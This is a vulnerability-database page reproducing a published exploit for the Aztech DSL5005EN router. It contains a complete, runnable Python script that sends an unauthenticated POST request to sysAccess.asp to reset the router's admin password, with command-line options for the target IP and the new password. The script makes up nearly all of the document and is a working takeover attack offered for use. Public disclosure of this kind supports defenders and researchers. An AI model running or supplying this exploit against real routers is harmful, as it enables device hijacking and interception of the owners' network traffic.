Vulners
Lucene search
Aztech DSL5005EN Authentication Bypass
🗓️ 24 Mar 2025 00:00:00Reported by Amir Hossein JamshidiType 
packetstorm🔗 packetstorm.news👁 129 Views
# Exploit Title: Aztech DSL5005EN Router - 'sysAccess.asp' Admin Password Change (Unauthenticated)
# Date: 2025-02-26
# Exploit Author: Amir Hossein Jamshidi
# Vendor Homepage: https://www.aztech.com
# Version: DSL5005EN
# Tested on: Linux
# CVE: N/A
import requests
import argparse
print('''
#################################################################################
# aztech DSL5005EN router/modem - admin password change (Unauthenticated) #
# BY: Amir Hossein Jamshidi #
# Mail: [email protected] #
# github: https://github.com/amirhosseinjamshidi64 #
# Usage: python Exploit.py --ip TRAGET_IP --password PASSWORD #
#################################################################################
''')
def change_password(ip_address, password):
"""
Changes the password of a device at the given IP address.
Args:
ip_address: The IP address of the device (e.g., "192.168.1.1").
password: The new password to set.
"""
url = f"http://{ip_address}/cgi-bin/sysAccess.asp"
origin = f"http://{ip_address}"
referer = f"http://{ip_address}/cgi-bin/sysAccess.asp"
payload = {
"saveFlag": "1",
"adminFlag": "1",
"SaveBtn": "SAVE",
"uiViewTools_Password": password,
"uiViewTools_PasswordConfirm": password
}
headers = {
"Cache-Control": "max-age=0",
"Accept-Language": "en-US,en;q=0.9",
"Origin": origin,
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Referer": referer,
"Connection": "keep-alive"
}
try:
response = requests.post(url, data=payload, headers=headers, timeout=10)
if response.status_code == 200:
print(f"Password change request to {ip_address} successful!")
print(f"Username: admin")
print(f"Password: {password}")
else:
print(f"Request to {ip_address} failed with status code: {response.status_code}")
print(f"Response content:\n{response.text}") # Print response for debugging
except requests.exceptions.RequestException as e:
print(f"An error occurred: {e}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Change password of a device.")
parser.add_argument("--ip", dest="ip_address", required=True, help="The IP address of the device.")
parser.add_argument("--password", dest="password", required=True, help="The new password to set.")
args = parser.parse_args()
change_password(args.ip_address, args.password)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Mar 2025 00:00Current
7.7High risk
Vulners AI Score7.7